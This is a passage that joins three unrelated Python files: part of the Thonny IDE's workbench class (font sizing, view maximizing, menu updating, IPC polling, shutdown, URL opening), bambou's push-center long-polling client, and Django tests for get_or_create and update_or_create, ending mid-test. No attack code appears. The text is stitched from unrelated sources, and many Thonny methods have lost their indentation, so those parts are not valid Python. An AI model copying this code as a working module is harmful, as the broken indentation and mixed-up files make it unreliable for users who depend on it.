if event.delta > 0:
self._change_font_size(1)
else:
self._change_font_size(-1)
    def _toggle_font_size(self) -> None:
        """Cycle editor font size small -> medium -> large (sizes depend on screen width)
        and resize the window to a width suitable for the new size."""
        current_size = self.get_option("view.editor_font_size")
        if self.winfo_screenwidth() < 1024:
            # assuming 32x32 icons
            small_size = 10
            medium_size = 12
            large_size = 14
        elif self.winfo_screenwidth() < 1280:
            # assuming 32x32 icons
            small_size = 12
            medium_size = 14
            large_size = 18
        else:
            small_size = 12
            medium_size = 16
            large_size = 20
        # preferred window width per font size
        widths = {10: 800, 12: 1050, 14: 1200, 16: 1300, 18: 1400, 20: 1650}
        if current_size < small_size or current_size >= large_size:
            new_size = small_size
        elif current_size < medium_size:
            new_size = medium_size
        else:
            new_size = large_size
        self._change_font_size(new_size - current_size)
        new_width = min(widths[new_size], self.winfo_screenwidth())
        # keep height and position, change only the width
        geo = re.findall(r"\d+", self.wm_geometry())
        self.geometry("{0}x{1}+{2}+{3}".format(new_width, geo[1], geo[2], geo[3]))
def _change_font_size(self, delta: int) -> None:
if delta != 0:
editor_font_size = self.get_option("view.editor_font_size")
editor_font_size += delta
self.set_option("view.editor_font_size", self._guard_font_size(editor_font_size))
io_font_size = self.get_option("view.io_font_size")
io_font_size += delta
self.set_option("view.io_font_size", self._guard_font_size(io_font_size))
self.update_fonts()
def _guard_font_size(self, size: int) -> int:
# https://bitbucket.org/plas/thonny/issues/164/negative-font-size-crashes-thonny
MIN_SIZE = 4
MAX_SIZE = 200
if size < MIN_SIZE:
return MIN_SIZE
elif size > MAX_SIZE:
return MAX_SIZE
else:
return size
    def _check_update_window_width(self, delta: int) -> None:
        """Widen/narrow the window by *delta* pixels, but only when not zoomed."""
        if not ui_utils.get_zoomed(self):
            self.update_idletasks()
            # TODO: shift to left if right edge goes away from screen
            # TODO: check with screen width
            new_geometry = "{0}x{1}+{2}+{3}".format(
                self.winfo_width() + delta, self.winfo_height(), self.winfo_x(), self.winfo_y()
            )
            self.geometry(new_geometry)
    def _maximize_view(self, event=None) -> None:
        """Expand the currently focused view/editor to fill the whole window.

        Walks up from the focused widget to find one with a home_widget
        (i.e. a relocatable view), re-grids it over the main frame and
        records it in self._maximized_view.
        """
        if self._maximized_view is not None:
            return
        # find the widget that can be relocated
        widget = self.focus_get()
        if isinstance(widget, (EditorNotebook, AutomaticNotebook)):
            current_tab = widget.get_current_child()
            if current_tab is None:
                return
            if not hasattr(current_tab, "maximizable_widget"):
                return
            widget = current_tab.maximizable_widget
        while widget is not None:
            if hasattr(widget, "home_widget"):
                # if widget is view, then widget.master is workbench
                widget.grid(row=1, column=0, sticky=tk.NSEW, in_=widget.master)  # type: ignore
                # hide main_frame
                self._main_frame.grid_forget()
                self._maximized_view = widget
                self.get_variable("view.maximize_view").set(True)
                break
            else:
                widget = widget.master  # type: ignore
    def _unmaximize_view(self, event=None) -> None:
        """Undo _maximize_view: restore the normal layout and send the view home."""
        if self._maximized_view is None:
            return
        # restore main_frame
        self._main_frame.grid(row=1, column=0, sticky=tk.NSEW, in_=self)
        # put the maximized view back to its home_widget
        self._maximized_view.grid(
            row=0, column=0, sticky=tk.NSEW, in_=self._maximized_view.home_widget  # type: ignore
        )
        self._maximized_view = None
        self.get_variable("view.maximize_view").set(False)
    def show_options(self, page_key=None):
        """Open the configuration dialog, optionally preselecting a page.

        Restarts the backend afterwards if the dialog says changed
        settings require it.
        """
        dlg = ConfigurationDialog(self, self._configuration_pages)
        if page_key:
            dlg.select_page(page_key)
        ui_utils.show_dialog(dlg)
        if dlg.backend_restart_required:
            get_runner().restart_backend(False)
def _cmd_focus_editor(self) -> None:
self.get_editor_notebook().focus_set()
    def _cmd_focus_shell(self) -> None:
        """Show the shell view and move the insertion point past current input."""
        self.show_view("ShellView", True)
        shell = get_shell()
        # go to the end of any current input
        shell.text.mark_set("insert", "end")
        shell.text.see("insert")
    def _cmd_toggle_full_screen(self) -> None:
        """Toggle the "view.full_screen" option and apply it to the window.

        TODO: For mac
        http://wiki.tcl.tk/44444
        Switching a window to fullscreen mode
        (Normal Difference)
        To switch a window to fullscreen mode, the window must first be withdrawn.
              # For Linux/Mac OS X:
              set cfs [wm attributes $w -fullscreen]
              if { $::tcl_platform(os) eq "Darwin" } {
                  if { $cfs == 0 } {
                      # optional: save the window geometry
                      set savevar [wm geometry $w]
                  }
                  wm withdraw $w
              }
              wm attributes $w -fullscreen [expr {1-$cfs}]
              if { $::tcl_platform(os) eq "Darwin" } {
                  wm deiconify $w
                  if { $cfs == 1 } {
                      after idle [list wm geometry $w $savevar]
                  }
              }
        """
        var = self.get_variable("view.full_screen")
        var.set(not var.get())
        self.attributes("-fullscreen", var.get())
def _cmd_toggle_maximize_view(self) -> None:
if self._maximized_view is not None:
self._unmaximize_view()
else:
self._maximize_view()
    def _update_menu(self, menu: tk.Menu, menu_name: str) -> None:
        """Enable/disable each entry of *menu* according to its tester callback.

        Entries without a registered spec are left untouched; a tester that
        raises is treated as "disabled".
        """
        if menu.index("end") is None:
            # empty menu
            return
        for i in range(menu.index("end") + 1):
            item_data = menu.entryconfigure(i)
            if "label" in item_data:
                command_label = menu.entrycget(i, "label")
                if (menu_name, command_label) not in self._menu_item_specs:
                    continue
                tester = self._menu_item_specs[(menu_name, command_label)].tester
                # no tester means the item is always enabled
                enabled = not tester
                if tester:
                    try:
                        enabled = tester()
                    except Exception:
                        traceback.print_exc()
                        enabled = False
                if enabled:
                    menu.entryconfigure(i, state=tk.NORMAL)
                else:
                    menu.entryconfigure(i, state=tk.DISABLED)
def _find_location_for_menu_item(self, menu_name: str, command_label: str) -> Union[str, int]:
menu = self.get_menu(menu_name)
if menu.index("end") == None: # menu is empty
return "end"
specs = self._menu_item_specs[(menu_name, command_label)]
this_group_exists = False
for i in range(0, menu.index("end") + 1):
data = menu.entryconfigure(i)
if "label" in data:
# it's a command, not separator
sibling_label = menu.entrycget(i, "label")
sibling_group = self._menu_item_specs[(menu_name, sibling_label)].group
if sibling_group == specs.group:
this_group_exists = True
if specs.position_in_group == "alphabetic" and sibling_label > command_label:
return i
if sibling_group > specs.group:
assert (
not this_group_exists
) # otherwise we would have found the ending separator
menu.insert_separator(i)
return i
else:
# We found a separator
if this_group_exists:
# it must be the ending separator for this group
return i
# no group was bigger, ie. this should go to the end
if not this_group_exists:
menu.add_separator()
return "end"
    def _poll_ipc_requests(self) -> None:
        """Periodic poller: open files requested by secondary Thonny processes.

        Drains the IPC queue, opens each existing file in the editor, raises
        the window, then reschedules itself every 50 ms (also on error).
        """
        try:
            if self._ipc_requests.empty():
                return
            while not self._ipc_requests.empty():
                args = self._ipc_requests.get()
                try:
                    for filename in args:
                        if os.path.isfile(filename):
                            self.get_editor_notebook().show_file(filename)
                except Exception:
                    traceback.print_exc()
            self.become_active_window()
        finally:
            # reschedule regardless of success, so polling never stops
            self.after(50, self._poll_ipc_requests)
    def _on_close(self) -> None:
        """Window-close handler: veto if editors refuse, then save state and destroy."""
        if self._editor_notebook and not self._editor_notebook.check_allow_closing():
            return
        self._closing = True
        try:
            # persist layout, open files and options before tearing down
            self._save_layout()
            self._editor_notebook.remember_open_files()
            self.event_generate("WorkbenchClose")
            self._configuration_manager.save()
        except Exception:
            self.report_exception()
        self.destroy()
        self._destroyed = True
def _on_all_key_presses(self, event):
if running_on_windows():
ui_utils.handle_mistreated_latin_shortcuts(self._latin_shortcuts, event)
def _on_focus_in(self, event):
if self._lost_focus:
self._lost_focus = False
self.event_generate("WindowFocusIn")
def _on_focus_out(self, event):
if self.focus_get() is None:
if not self._lost_focus:
self._lost_focus = True
self.event_generate("WindowFocusOut")
def focus_get(self) -> Optional[tk.Widget]:
try:
return tk.Tk.focus_get(self)
except Exception:
# This may give error in Ubuntu
return None
    def destroy(self) -> None:
        """Tear down the workbench: clean up the IPC file, preserve clipboard
        contents past Tk shutdown, destroy the window and stop the backend."""
        try:
            if self._is_server() and os.path.exists(thonny.get_ipc_file_path()):
                os.remove(thonny.get_ipc_file_path())
            self._closing = True
            # Tk clipboard gets cleared on exit and won't end up in system clipboard
            # https://bugs.python.org/issue1207592
            # https://stackoverflow.com/questions/26321333/tkinter-in-python-3-4-on-windows-dont-post-internal-clipboard-data-to-the-windo
            try:
                clipboard_data = self.clipboard_get()
                if len(clipboard_data) < 1000 and all(
                    map(os.path.exists, clipboard_data.splitlines())
                ):
                    # Looks like the clipboard contains file name(s)
                    # Most likely this means actual file cut/copy operation
                    # was made outside of Thonny.
                    # Don't want to replace this with simple string data of file names.
                    pass
                else:
                    copy_to_clipboard(clipboard_data)
            except Exception:
                pass
        except Exception:
            logging.exception("Error while destroying workbench")
        finally:
            try:
                super().destroy()
            finally:
                # stop the backend even if Tk destruction failed
                runner = get_runner()
                if runner != None:
                    runner.destroy_backend()
    def _on_configure(self, event) -> None:
        # called when window is moved or resized
        if (
            hasattr(self, "_maximized_view")  # configure may happen before the attribute is defined
            and self._maximized_view  # type: ignore
        ):
            # grid again, otherwise it acts weird
            self._maximized_view.grid(
                row=1, column=0, sticky=tk.NSEW, in_=self._maximized_view.master  # type: ignore
            )
def _on_tk_exception(self, exc, val, tb) -> None:
# copied from tkinter.Tk.report_callback_exception with modifications
# see http://bugs.python.org/issue22384
sys.last_type = exc
sys.last_value = val
sys.last_traceback = tb
self.report_exception()
    def report_exception(self, title: str = "Internal error") -> None:
        """Log the active exception and, unless closing, show it in a dialog."""
        logging.exception(title)
        if tk._default_root and not self._closing:  # type: ignore
            (typ, value, _) = sys.exc_info()
            assert typ is not None
            if issubclass(typ, UserError):
                # UserError carries a user-presentable message; no traceback needed
                msg = str(value)
            else:
                msg = traceback.format_exc()
            dlg = ui_utils.LongTextDialog(title, msg, parent=self)
            ui_utils.show_dialog(dlg, self)
def _open_views(self) -> None:
for nb_name in self._view_notebooks:
view_name = self.get_option("layout.notebook_" + nb_name + "_visible_view")
if view_name != None:
if view_name == "GlobalsView":
# was renamed in 2.2b5
view_name = "VariablesView"
if self.get_ui_mode() != "simple" or view_name in SIMPLE_MODE_VIEWS:
self.show_view(view_name)
# make sure VariablesView is at least loaded
# otherwise it may miss globals events
# and will show empty table on open
self.get_view("VariablesView")
if (
self.get_option("assistance.open_assistant_on_errors")
or self.get_option("assistance.open_assistant_on_warnings")
) and (self.get_ui_mode() != "simple" or "AssistantView" in SIMPLE_MODE_VIEWS):
self.get_view("AssistantView")
    def _save_layout(self) -> None:
        """Persist window geometry, zoom state, visible views and pane sizes."""
        self.update_idletasks()
        self.set_option("layout.zoomed", ui_utils.get_zoomed(self))
        for nb_name in self._view_notebooks:
            widget = self._view_notebooks[nb_name].get_visible_child()
            if hasattr(widget, "maximizable_widget"):
                view = widget.maximizable_widget
                view_name = type(view).__name__
                self.set_option("layout.notebook_" + nb_name + "_visible_view", view_name)
            else:
                self.set_option("layout.notebook_" + nb_name + "_visible_view", None)
        if not ui_utils.get_zoomed(self) or running_on_mac_os():
            # can't restore zoom on mac without setting actual dimensions
            gparts = re.findall(r"\d+", self.wm_geometry())
            self.set_option("layout.width", int(gparts[0]))
            self.set_option("layout.height", int(gparts[1]))
            self.set_option("layout.left", int(gparts[2]))
            self.set_option("layout.top", int(gparts[3]))
        self.set_option("layout.west_pw_width", self._west_pw.preferred_size_in_pw)
        self.set_option("layout.east_pw_width", self._east_pw.preferred_size_in_pw)
        for key in ["nw", "sw", "s", "se", "ne"]:
            self.set_option(
                "layout.%s_nb_height" % key, self._view_notebooks[key].preferred_size_in_pw
            )
def update_title(self, event=None) -> None:
editor = self.get_editor_notebook().get_current_editor()
if self._is_portable:
title_text = "Portable Thonny"
else:
title_text = "Thonny"
if editor != None:
title_text += " - " + editor.get_long_description()
self.title(title_text)
    def become_active_window(self, force=True) -> None:
        # Looks like at least on Windows all following is required
        # for ensuring the window gets focus
        # (deiconify, ..., iconify, deiconify)
        self.deiconify()
        if force:
            # temporary topmost flag pulls the window to front, then is cleared
            self.attributes("-topmost", True)
            self.after_idle(self.attributes, "-topmost", False)
            self.lift()
            if not running_on_linux():
                # http://stackoverflow.com/a/13867710/261181
                self.iconify()
                self.deiconify()
        editor = self.get_editor_notebook().get_current_editor()
        if editor is not None:
            # This method is meant to be called when new file is opened, so it's safe to
            # send the focus to the editor
            editor.focus_set()
        else:
            self.focus_set()
    def open_url(self, url):
        """Open Thonny-specific URL schemes internally, others in the browser.

        Supported forms: thonny-editor://<path>[#line[:col]],
        thonny-help://<topic>[#fragment], local *.rst paths, and anything
        else is delegated to the system web browser.
        """
        m = re.match(r"^thonny-editor://(.*?)(#(\d+)(:(\d+))?)?$", url)
        if m is not None:
            filename = m.group(1).replace("%20", " ")
            lineno = None if m.group(3) is None else int(m.group(3))
            col_offset = None if m.group(5) is None else int(m.group(5))
            if lineno is None:
                self.get_editor_notebook().show_file(filename)
            else:
                self.get_editor_notebook().show_file_at_line(filename, lineno, col_offset)
            return
        m = re.match(r"^thonny-help://(.*?)(#(.+))?$", url)
        if m is not None:
            topic = m.group(1)
            fragment = m.group(3)
            self.show_view("HelpView").load_topic(topic, fragment)
            return
        if url.endswith(".rst") and not url.startswith("http"):
            # local help document, e.g. "errors.rst#name-error"
            parts = url.split("#", maxsplit=1)
            topic = parts[0][:-4]
            if len(parts) == 2:
                fragment = parts[1]
            else:
                fragment = None
            self.show_view("HelpView").load_topic(topic, fragment)
            return
        # Fallback
        import webbrowser
        webbrowser.open(url, False, True)
def open_help_topic(self, topic, fragment=None):
self.show_view("HelpView").load_topic(topic, fragment)
def bell(self, displayof=0):
if not self.get_option("general.disable_notification_sound"):
super().bell(displayof=displayof)
def _mac_quit(self, *args):
self._on_close()
def _is_server(self):
return self._ipc_requests is not None
def get_toolbar(self):
return self._toolbar
class WorkbenchEvent(Record):
    """Event object passed to Workbench event handlers.

    Carries the event's sequence name plus arbitrary payload attributes
    (stored via the Record base class).
    """

    def __init__(self, sequence: str, **kwargs) -> None:
        Record.__init__(self, **kwargs)
        # name of the (virtual) event sequence this instance represents
        self.sequence = sequence
|
nurest_push_center.py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from builtins import object
import json
import threading
from time import time
from .nurest_connection import NURESTConnection
from .nurest_request import NURESTRequest
from bambou import pushcenter_logger
class StoppableThread(threading.Thread):
    """ Thread class with a stop() method. The thread itself has to check
        regularly for the stopped() condition.

        stop() only raises a flag; it does not interrupt the thread.
    """

    def __init__(self, *args, **kwargs):
        super(StoppableThread, self).__init__(*args, **kwargs)
        self._stopper = threading.Event()

    def stop(self):
        """ Ask the thread to stop at its next stopped() check. """
        self._stopper.set()

    def stopped(self):
        """ Return True once stop() has been called. """
        # is_set() replaces the deprecated camelCase alias isSet()
        return self._stopper.is_set()
class NURESTPushCenter(object):
    """ Push center wait for push notifications.

        It has to listen a specific URL.
        Every time a notification is send, it will automatically get it
        and store it into get_last_events method.
    """

    def __init__(self):
        """ Initialize push center """
        self._url = None
        self._is_running = False
        self._current_connection = None
        self._last_events = list()
        self.nb_events_received = 0
        self.nb_push_received = 0
        self._thread = None
        self._root_object = None
        self._start_time = None
        self._timeout = None
        self._delegate_methods = list()

    # Properties

    @property
    def url(self):
        """ Get url """
        return self._url

    @url.setter
    def url(self, url):
        """ Set url """
        self._url = url

    @property
    def is_running(self):
        """ Get is_running """
        return self._is_running

    # Control Methods

    def start(self, timeout=None, root_object=None):
        """ Starts listening to events.

            Args:
                timeout (int): number of seconds before timeout. Used for testing purpose only.
                root_object (bambou.NURESTRootObject): NURESTRootObject object that is listening. Used for testing purpose only.
        """
        if self._is_running:
            return

        if timeout:
            self._timeout = timeout
            self._start_time = int(time())

        pushcenter_logger.debug("[NURESTPushCenter] Starting push center on url %s ..." % self.url)
        self._is_running = True

        # BUG FIX: was `self.__root_object = root_object`, which name-mangles
        # to `_NURESTPushCenter__root_object` and left `self._root_object`
        # (the attribute actually read by _listen) permanently None.
        self._root_object = root_object

        from .nurest_session import NURESTSession
        current_session = NURESTSession.get_current_session()
        args_session = {'session': current_session}

        self._thread = StoppableThread(target=self._listen, name='push-center', kwargs=args_session)
        self._thread.daemon = True
        self._thread.start()

    def stop(self):
        """ Stops listening for events. """
        if not self._is_running:
            return

        pushcenter_logger.debug("[NURESTPushCenter] Stopping...")
        self._thread.stop()
        self._thread.join()

        self._is_running = False
        self._current_connection = None
        self._start_time = None
        self._timeout = None

    def wait_until_exit(self):
        """ Wait until thread exit

            Used for testing purpose only
        """
        if self._timeout is None:
            raise Exception("Thread will never exit. Use stop or specify timeout when starting it!")

        self._thread.join()
        self.stop()

    # Events

    def get_last_events(self):
        """ Retrieve events that has been

            Returns:
                Returns a list of events and flush existing events.
        """
        events = self._last_events
        self._last_events = list()
        return events

    # Private methods

    def _did_receive_event(self, connection):
        """ Receive an event from connection """
        if not self._is_running:
            return

        if connection.has_timeouted:
            return

        response = connection.response
        data = None

        if response.status_code != 200:
            pushcenter_logger.error("[NURESTPushCenter]: Connection failure [%s] %s" % (response.status_code, response.errors))
        else:
            data = response.data

        if len(self._delegate_methods) > 0:
            # delegates take precedence over local event accumulation
            for m in self._delegate_methods:
                try:
                    m(data)
                except Exception as exc:
                    pushcenter_logger.error("[NURESTPushCenter] Delegate method %s failed:\n%s" % (m, exc))
        elif data:
            events = data['events']
            self.nb_events_received += len(events)
            self.nb_push_received += 1
            pushcenter_logger.info("[NURESTPushCenter] Received Push #%s (total=%s, latest=%s)\n%s" % (self.nb_push_received, self.nb_events_received, len(events), json.dumps(events, indent=4)))
            self._last_events.extend(events)

        if self._is_running:
            # reconnect with the server-provided uuid to resume the stream
            uuid = None
            if data and 'uuid' in data:
                uuid = data['uuid']
            self._listen(uuid)

    def _listen(self, uuid=None, session=None):
        """ Listen a connection uuid """
        if self.url is None:
            raise Exception("NURESTPushCenter needs to have a valid URL. please use setURL: before starting it.")

        events_url = "%s/events" % self.url
        if uuid:
            events_url = "%s?uuid=%s" % (events_url, uuid)

        request = NURESTRequest(method='GET', url=events_url)

        # NOTE(review): an earlier comment claimed as_async is forced to False,
        # but as_async=True is what is actually passed. Presumably the single
        # listener thread is preserved by _did_receive_event re-invoking
        # _listen -- confirm against NURESTConnection semantics.
        connection = NURESTConnection(request=request, as_async=True, callback=self._did_receive_event, root_object=self._root_object)

        if self._timeout:
            if int(time()) - self._start_time >= self._timeout:
                pushcenter_logger.debug("[NURESTPushCenter] Timeout (timeout=%ss)." % self._timeout)
                return
            else:
                connection.timeout = self._timeout

        pushcenter_logger.info('Bambou Sending >>>>>>\n%s %s' % (request.method, request.url))
        # connection.ignore_request_idle = True
        connection.start()

    def add_delegate(self, callback):
        """ Registers a new delegate callback

            The prototype should be function(data), where data will be the decoded json push

            Args:
                callback (function): method to trigger when push center receives events
        """
        if callback in self._delegate_methods:
            return

        self._delegate_methods.append(callback)

    def remove_delegate(self, callback):
        """ Unregisters a registered delegate function or a method.

            Args:
                callback(function): method to trigger when push center receives events
        """
        if callback not in self._delegate_methods:
            return

        self._delegate_methods.remove(callback)
|
tests.py | import time
import traceback
from datetime import date, datetime, timedelta
from threading import Thread
from django.core.exceptions import FieldError
from django.db import DatabaseError, IntegrityError, connection
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, skipUnlessDBFeature,
)
from .models import (
Author, Book, DefaultPerson, ManualPrimaryKeyTest, Person, Profile,
Publisher, Tag, Thing,
)
class GetOrCreateTests(TestCase):
    """Tests for QuerySet.get_or_create() on default and related managers."""

    def setUp(self):
        # One pre-existing Person for exercising the "get" half of get_or_create.
        self.lennon = Person.objects.create(
            first_name='John', last_name='Lennon', birthday=date(1940, 10, 9)
        )

    def test_get_or_create_method_with_get(self):
        """An existing matching row is fetched, not created again."""
        created = Person.objects.get_or_create(
            first_name="John", last_name="Lennon", defaults={
                "birthday": date(1940, 10, 9)
            }
        )[1]
        self.assertFalse(created)
        self.assertEqual(Person.objects.count(), 1)

    def test_get_or_create_method_with_create(self):
        """A non-matching lookup creates a new row using defaults."""
        created = Person.objects.get_or_create(
            first_name='George', last_name='Harrison', defaults={
                'birthday': date(1943, 2, 25)
            }
        )[1]
        self.assertTrue(created)
        self.assertEqual(Person.objects.count(), 2)

    def test_get_or_create_redundant_instance(self):
        """
        If we execute the exact same statement twice, the second time,
        it won't create a Person.
        """
        Person.objects.get_or_create(
            first_name='George', last_name='Harrison', defaults={
                'birthday': date(1943, 2, 25)
            }
        )
        created = Person.objects.get_or_create(
            first_name='George', last_name='Harrison', defaults={
                'birthday': date(1943, 2, 25)
            }
        )[1]
        self.assertFalse(created)
        self.assertEqual(Person.objects.count(), 2)

    def test_get_or_create_invalid_params(self):
        """
        If you don't specify a value or default value for all required
        fields, you will get an error.
        """
        with self.assertRaises(IntegrityError):
            Person.objects.get_or_create(first_name="Tom", last_name="Smith")

    def test_get_or_create_with_pk_property(self):
        """
        Using the pk property of a model is allowed.
        """
        Thing.objects.get_or_create(pk=1)

    def test_get_or_create_on_related_manager(self):
        """get_or_create works through FK and M2M related managers."""
        p = Publisher.objects.create(name="Acme Publishing")
        # Create a book through the publisher.
        book, created = p.books.get_or_create(name="The Book of Ed & Fred")
        self.assertTrue(created)
        # The publisher should have one book.
        self.assertEqual(p.books.count(), 1)
        # Try get_or_create again, this time nothing should be created.
        book, created = p.books.get_or_create(name="The Book of Ed & Fred")
        self.assertFalse(created)
        # And the publisher should still have one book.
        self.assertEqual(p.books.count(), 1)
        # Add an author to the book.
        ed, created = book.authors.get_or_create(name="Ed")
        self.assertTrue(created)
        # The book should have one author.
        self.assertEqual(book.authors.count(), 1)
        # Try get_or_create again, this time nothing should be created.
        ed, created = book.authors.get_or_create(name="Ed")
        self.assertFalse(created)
        # And the book should still have one author.
        self.assertEqual(book.authors.count(), 1)
        # Add a second author to the book.
        fred, created = book.authors.get_or_create(name="Fred")
        self.assertTrue(created)
        # The book should have two authors now.
        self.assertEqual(book.authors.count(), 2)
        # Create an Author not tied to any books.
        Author.objects.create(name="Ted")
        # There should be three Authors in total. The book object should have two.
        self.assertEqual(Author.objects.count(), 3)
        self.assertEqual(book.authors.count(), 2)
        # Try creating a book through an author.
        _, created = ed.books.get_or_create(name="Ed's Recipes", publisher=p)
        self.assertTrue(created)
        # Now Ed has two Books, Fred just one.
        self.assertEqual(ed.books.count(), 2)
        self.assertEqual(fred.books.count(), 1)
        # Use the publisher's primary key value instead of a model instance.
        _, created = ed.books.get_or_create(name='The Great Book of Ed', publisher_id=p.id)
        self.assertTrue(created)
        # Try get_or_create again, this time nothing should be created.
        _, created = ed.books.get_or_create(name='The Great Book of Ed', publisher_id=p.id)
        self.assertFalse(created)
        # The publisher should have three books.
        self.assertEqual(p.books.count(), 3)

    def test_defaults_exact(self):
        """
        If you have a field named defaults and want to use it as an exact
        lookup, you need to use 'defaults__exact'.
        """
        obj, created = Person.objects.get_or_create(
            first_name='George', last_name='Harrison', defaults__exact='testing', defaults={
                'birthday': date(1943, 2, 25),
                'defaults': 'testing',
            }
        )
        self.assertTrue(created)
        self.assertEqual(obj.defaults, 'testing')
        obj2, created = Person.objects.get_or_create(
            first_name='George', last_name='Harrison', defaults__exact='testing', defaults={
                'birthday': date(1943, 2, 25),
                'defaults': 'testing',
            }
        )
        self.assertFalse(created)
        self.assertEqual(obj, obj2)

    def test_callable_defaults(self):
        """
        Callables in `defaults` are evaluated if the instance is created.
        """
        obj, created = Person.objects.get_or_create(
            first_name="George",
            defaults={"last_name": "Harrison", "birthday": lambda: date(1943, 2, 25)},
        )
        self.assertTrue(created)
        self.assertEqual(date(1943, 2, 25), obj.birthday)

    def test_callable_defaults_not_called(self):
        """Callables in `defaults` are NOT evaluated when the row already exists."""
        def raise_exception():
            raise AssertionError
        # lookup matches the row from setUp, so the callable must never run
        obj, created = Person.objects.get_or_create(
            first_name="John", last_name="Lennon",
            defaults={"birthday": lambda: raise_exception()},
        )
class GetOrCreateTestsWithManualPKs(TestCase):
    """get_or_create() behavior for models with manually assigned primary keys."""

    def setUp(self):
        # Row with a manual pk that later tests collide with.
        self.first_pk = ManualPrimaryKeyTest.objects.create(id=1, data="Original")

    def test_create_with_duplicate_primary_key(self):
        """
        If you specify an existing primary key, but different other fields,
        then you will get an error and data will not be updated.
        """
        with self.assertRaises(IntegrityError):
            ManualPrimaryKeyTest.objects.get_or_create(id=1, data="Different")
        self.assertEqual(ManualPrimaryKeyTest.objects.get(id=1).data, "Original")

    def test_get_or_create_raises_IntegrityError_plus_traceback(self):
        """
        get_or_create should raise IntegrityErrors with the full traceback.
        This is tested by checking that a known method call is in the traceback.
        We cannot use assertRaises here because we need to inspect
        the actual traceback. Refs #16340.
        """
        try:
            ManualPrimaryKeyTest.objects.get_or_create(id=1, data="Different")
        except IntegrityError:
            formatted_traceback = traceback.format_exc()
            self.assertIn('obj.save', formatted_traceback)

    def test_savepoint_rollback(self):
        """
        The database connection is still usable after a DatabaseError in
        get_or_create() (#20463).
        """
        Tag.objects.create(text='foo')
        with self.assertRaises(DatabaseError):
            # pk 123456789 doesn't exist, so the tag object will be created.
            # Saving triggers a unique constraint violation on 'text'.
            Tag.objects.get_or_create(pk=123456789, defaults={'text': 'foo'})
        # Tag objects can be created after the error.
        Tag.objects.create(text='bar')

    def test_get_or_create_empty(self):
        """
        If all the attributes on a model have defaults, get_or_create() doesn't
        require any arguments.
        """
        DefaultPerson.objects.get_or_create()
class GetOrCreateTransactionTests(TransactionTestCase):
    """get_or_create() tests needing real (non-rolled-back) transactions."""
    available_apps = ['get_or_create']
    def test_get_or_create_integrityerror(self):
        """
        Regression test for #15117. Requires a TransactionTestCase on
        databases that delay integrity checks until the end of transactions,
        otherwise the exception is never raised.
        """
        try:
            # Person(id=1) is unsaved, so the FK constraint should fail
            # when the transaction's integrity checks run.
            Profile.objects.get_or_create(person=Person(id=1))
        except IntegrityError:
            pass
        else:
            self.skipTest("This backend does not support integrity checks.")
class GetOrCreateThroughManyToMany(TestCase):
    """get_or_create() invoked through a many-to-many related manager."""
    def test_get_get_or_create(self):
        """An already-linked tag is returned rather than duplicated."""
        existing = Tag.objects.create(text='foo')
        thing = Thing.objects.create(name='a')
        thing.tags.add(existing)
        tag, was_created = thing.tags.get_or_create(text='foo')
        self.assertFalse(was_created)
        self.assertEqual(tag.pk, existing.pk)
    def test_create_get_or_create(self):
        """A missing tag is created and linked through the m2m."""
        thing = Thing.objects.create(name='a')
        tag, was_created = thing.tags.get_or_create(text='foo')
        self.assertTrue(was_created)
        self.assertEqual(tag.text, 'foo')
        self.assertIn(tag, thing.tags.all())
    def test_something(self):
        """A unique clash with an existing unlinked tag raises IntegrityError."""
        Tag.objects.create(text='foo')
        thing = Thing.objects.create(name='a')
        with self.assertRaises(IntegrityError):
            thing.tags.get_or_create(text='foo')
class UpdateOrCreateTests(TestCase):
    """Tests for QuerySet.update_or_create()."""
    def test_update(self):
        # Existing row: the defaults are applied as an update.
        Person.objects.create(
            first_name='John', last_name='Lennon', birthday=date(1940, 10, 9)
        )
        p, created = Person.objects.update_or_create(
            first_name='John', last_name='Lennon', defaults={
                'birthday': date(1940, 10, 10)
            }
        )
        self.assertFalse(created)
        self.assertEqual(p.first_name, 'John')
        self.assertEqual(p.last_name, 'Lennon')
        self.assertEqual(p.birthday, date(1940, 10, 10))
    def test_create(self):
        # No matching row: a new object is created from kwargs + defaults.
        p, created = Person.objects.update_or_create(
            first_name='John', last_name='Lennon', defaults={
                'birthday': date(1940, 10, 10)
            }
        )
        self.assertTrue(created)
        self.assertEqual(p.first_name, 'John')
        self.assertEqual(p.last_name, 'Lennon')
        self.assertEqual(p.birthday, date(1940, 10, 10))
    def test_create_twice(self):
        params = {
            'first_name': 'John',
            'last_name': 'Lennon',
            'birthday': date(1940, 10, 10),
        }
        Person.objects.update_or_create(**params)
        # If we execute the exact same statement, it won't create a Person.
        p, created = Person.objects.update_or_create(**params)
        self.assertFalse(created)
    def test_integrity(self):
        """
        If you don't specify a value or default value for all required
        fields, you will get an error.
        """
        with self.assertRaises(IntegrityError):
            Person.objects.update_or_create(first_name="Tom", last_name="Smith")
    def test_manual_primary_key_test(self):
        """
        If you specify an existing primary key, but different other fields,
        then you will get an error and data will not be updated.
        """
        ManualPrimaryKeyTest.objects.create(id=1, data="Original")
        with self.assertRaises(IntegrityError):
